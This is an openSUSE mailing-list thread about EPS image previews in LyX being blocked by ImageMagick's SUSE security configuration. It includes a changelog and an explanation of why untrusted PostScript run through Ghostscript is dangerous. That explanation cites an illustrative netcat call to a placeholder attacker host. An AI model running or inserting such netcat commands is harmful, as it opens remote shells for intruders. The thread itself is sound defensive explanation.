Hello, On Jul 4 14:24 Cor Blom wrote (excerpt):
Op 04-07-19 om 13:57 schreef Cor Blom:
Op 04-07-19 om 13:45 schreef Marcus Meissner:
On Thu, Jul 04, 2019 at 01:32:39PM +0200, Jan Engelhardt wrote:
On Thursday 2019-07-04 13:06, Cor Blom wrote:
I got a bug report that image preview of eps files was not working in LyX (boo#713289). I closed this as WONTFIX, because those settings are there for a reason. What is frustrating for users is: how do they know this is the reason a preview is not working?
What is even more frustrating for users is that the bug report is not accessible. So almost nobody can even develop an opinion that you are trying to elicit.
This is a submitrequest ID for Factory actually ...
+- Update the description in the spec file with information on + security setting for ImageMagick in openSUSE. See boo#1139928 + It seems the only thing we can do about it.
There is the bug, it is open.
Yes, sorry, 713289 was SR number. The bugreport number is #1139928 My mistake.
And the relevant changelog in ImageMagick is:
Thu Feb 28 11:44:05 UTC 2019 - pgajdos@suse.com
- provide two new (conflicting) packages with configuration [bsc#1122033]: * ImageMagick-config-upstream - provides configuration provided by upstream (no restrictions) * ImageMagick-config-SUSE (preferred) - provides configuration provided by SUSE (with security restrictions) and use update-alternatives for selecting configurations. - remove code for < 1315 - deleted patches - ImageMagick-disable-insecure-coders.patch (renamed) - added patches + ImageMagick-configuration-SUSE.patch
FYI: For some background information about the root cause behind all those PostScript/Ghostscript related security issues see the section "It is crucial to limit access to CUPS to trusted users" in https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings that reads (excerpts): ------------------------------------------------------------------- PostScript but also PDF to some extent ... is actually a program. ... PostScript is a general purpose Turing-complete programming language (cf. https://en.wikipedia.org/wiki/PostScript) that supports in particular file access on the system disk. When Ghostscript processes PostScript it runs a PostScript program as the user who runs Ghostscript ... When Ghostscript processes an arbitrary PostScript file, the user who runs Ghostscript runs an arbitrary program which can do anything on the system where Ghostscript runs that this user is allowed to do on that system. To make it safer when Ghostscript runs a PostScript program the Ghostscript command line option '-dSAFER' disables certain file access functionality (for details see /usr/share/doc/ghostscript/*/Use.htm). ... Its name 'SAFER' says everything: It makes it 'safer' to let Ghostscript run a PostScript program, but it does not make it completely safe. ------------------------------------------------------------------- Simply put: Via some special (but well known) indirections in Ghostscript a PostScript program or an Encapsulated PostScript [EPS] program that a user runs via Ghostscript could execute certain stuff which results basically the equivalent of things like netcat server.attacker.net 12345 http://bugzilla.opensuse.org/show_bug.cgi?id=1134327#c13 In the end it means: By default it must not be allowd to let Ghostscript (or any other PostScript interpreter) run arbitrary PostScript programs from (possibly) untrusted origin. Kind Regards Johannes Meixner -- SUSE LINUX GmbH - HRB 21284 (AG Nuernberg) GF: Felix Imendoerffer, Mary Higgins, Sri Rasiah